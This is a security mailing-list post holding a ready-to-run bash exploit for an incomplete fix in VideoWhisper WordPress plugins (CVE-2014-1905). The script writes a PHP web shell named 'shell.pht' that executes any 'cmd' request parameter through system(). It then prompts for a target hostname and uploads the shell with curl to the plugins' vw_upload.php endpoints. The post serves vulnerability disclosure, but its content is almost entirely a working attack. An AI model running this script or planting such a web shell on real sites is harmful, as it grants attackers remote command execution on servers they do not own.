Exploit for VideoWhisper WP plugins file upload incomplete fix.

["Larry W. Cashdollar" <larry0 () me com>]

#!/bin/bash
#A quick Exploit for the VideoWhisper file upload incomplete fix I posted a few weeks ago.
#Larry W. Cashdollar v1.0

cat > shell.pht << -EOF-
<?php
if(isset(\$_REQUEST[‘cmd’])){
        echo "<pre>";
        \$cmd = (\$_REQUEST[‘cmd’]);
        system(\$cmd);
        echo "</pre>";
} else { echo "Please supply a command cmd"; }
?>
-EOF-

red='\033[0;31m'
NC='\033[0m' # No Color

while [ true ]; do 
echo -e ${red};
echo -e "                               VideoWhisper Remote File Upload PoC Redux $NC";
echo "                                          4/14/2015";
echo "                                     Larry W. Cashdollar, @_larry0";
echo
echo
echo "Linux OSs like Debian or Ubuntu have .phtml, .pht defined as";
echo "SetHandler application/x-httpd-php in php5.conf";
echo "So WP instances hosted on thos OSs are still vulnerable to CVE-2014-1905";
echo "and bid 53851.";
echo "               - Advisories -";
echo "http://www.vapid.dhs.org/blog/04-16-2015/";;
echo "http://www.vapid.dhs.org/advisory.php?v=116";;
echo "http://www.vapid.dhs.org/advisory.php?v=117";;
echo 
echo
echo "Ctrl ^C to exit";
echo -n "Enter Target Hostname :";
read target;
echo -n "Enter 1 for integration 2 for presentation :";
read plugin;
echo -n "Enter payload filename or (shell.pht):";
read file;
echo "[+] Hostname $target";
echo "[+] File $file";
if [ $plugin == 1 ]; then
echo "[+] Targeting Video Conference Plugin";
echo
        curl --form "vw_file=@$file" --form "name=$file" --form "room=./" 
http://$target/wp-content/plugins/videowhisper-video-conference-integration/vc/vw_upload.php
else
echo "[+] Targeting Video Presentation Plugin";
echo
        curl --form "vw_file=@$file" --form "name=$file" --form "room=./" 
http://$target/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php
fi;
done